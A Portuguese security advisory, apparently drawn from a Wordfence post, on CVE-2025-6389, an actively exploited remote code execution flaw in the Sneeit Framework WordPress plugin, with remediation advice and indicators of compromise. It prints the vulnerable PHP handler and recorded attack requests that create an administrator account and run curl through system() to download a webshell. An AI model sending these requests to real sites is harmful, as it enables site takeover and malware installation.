Vulnerabilidade Crítica no Sneeit Framework Permite Execução Remota de Código (RCE) e Já Está Sendo Ativamente Explorada

Ataques Ativos Exploram Falha Crítica no Plugin Sneeit Framework

Em 10 de junho de 2025, pesquisadores receberam um relatório sobre uma vulnerabilidade de Remote Code Execution (RCE) no Sneeit Framework, plugin WordPress presente em diversos temas premium e com cerca de 1.700 instalações ativas.

A falha permite que invasores executem código remotamente no servidor — um dos cenários mais perigosos possíveis.

O patch foi lançado em 5 de agosto de 2025, mas a divulgação pública aconteceu apenas em 24 de novembro de 2025. No mesmo dia, ataques começaram a ser registrados em massa.

O Firewall do Wordfence já bloqueou mais de 131.000 tentativas de exploração dessa vulnerabilidade.

Usuários de Wordfence Premium, Care e Response foram protegidos no dia 23 de junho, enquanto a versão gratuita recebeu a regra de proteção em 23 de julho de 2025.

A recomendação oficial é atualizar imediatamente para a versão 8.4, pois a exploração está ativa.


Resumo da Vulnerabilidade

ItemInformação
TipoExecução Remota de Código (RCE)
Severidade (CVSS)9.8 – Crítico
CVECVE-2025-6389
Versões Afetadas≤ 8.3
Versão Corrigida8.4
PluginSneeit Framework
Função Vulnerávelsneeit_articles_pagination_callback()

A falha ocorre porque o plugin aceita funções enviadas pelo usuário via AJAX e as executa com call_user_func(), sem qualquer validação. Isso permite que invasores chamem qualquer função PHP, com parâmetros também controlados via requisição.


Como a Exploração Funciona

A função vulnerável usa dois parâmetros:

  • callback → nome da função PHP a ser executada
  • args → parâmetros enviados pelo atacante

Exemplo simplificado do código vulnerável:

function sneeit_articles_pagination_callback() {
    $callback = sneeit_get_server_request('callback');
 
    if (function_exists($callback)) {
        $args = sneeit_get_server_request('args');
        $args = json_decode(trim(wp_unslash($args)), true);
        call_user_func($callback, $args);
    }
    die();
}

Como não há restrição alguma, invasores conseguem:

✔ Criar usuários administradores
✔ Executar comandos no servidor
✔ Enviar arquivos maliciosos
✔ Instalar backdoors e webshells
✔ Obter controle total do site WordPress


Exemplos de Ataques Reais Registrados

1. Criação de usuário administrador malicioso

POST /wp-admin/admin-ajax.php
action=sneeit_articles_pagination
&callback=wp_insert_user
&args=user_login=arudikadis&role=administrator&...

2. Upload de backdoor com comando system()

action=sneeit_articles_pagination
&callback=system
&args="curl -sL https://[redacted]/.F/up_sf.txt -o tijtewmg.php"

3. Testes usando phpinfo()

action=sneeit_articles_pagination
&callback=phpinfo
&args=-1

IPs Mais Ativos Explorando a Falha

  • 185.125.50.59 — +74.000 tentativas
  • 182.8.226.51 — +24.200
  • 89.187.175.80 — +4.600
  • 194.104.147.192 — +2.600
  • 196.251.100.39 — +2.100
  • 114.10.116.226 — +1.500
  • 116.234.108.143 — +1.200

Indicadores de Comprometimento

Seu site pode estar comprometido se houver:

🔴 Usuário administrador desconhecido criado recentemente

Invadores usam wp_insert_user() para escalar privilégios.

🔴 Arquivos suspeitos como:

  • xL.php
  • Canonical.php
  • .a.php
  • simple.php
  • up_sf.php
  • tijtewmg.php

Esses arquivos geralmente possuem:

  • leitor/editor de arquivos
  • scanner de diretórios
  • funções para extrair ZIP
  • rotinas de privilégio
  • localizador de webshells

🔴 Arquivos suspeitos no servidor

  • finderdata.txt
  • goodfinderdata.txt

🔴 .htaccess alterado para permitir execução de arquivos PHP

<FilesMatch '.(py|exe|phtml|php|...)$'>
    Order allow,deny
    Allow from all
</FilesMatch>

Esse comportamento é típico de invasões automatizadas.

🔴 Requisições AJAX vindas dos IPs listados

Verifique seus logs.


Domínios Envolvidos

  • racoonlab.top (já adicionado às listas de bloqueio)

Como Proteger Seu Site

  • Atualize imediatamente para o Sneeit Framework 8.4
  • Habilite firewall e regras atualizadas (Wordfence ou similar)
  • Revise logs de AJAX
  • Procure por arquivos maliciosos listados
  • Remova usuários suspeitos
  • Restaure arquivos alterados
  • Verifique .htaccess
  • Faça scan completo com scanner de malware

Fonte do post: https://www.wordfence.com/blog/2025/12/attackers-actively-exploiting-critical-vulnerability-in-sneeit-framework-plugin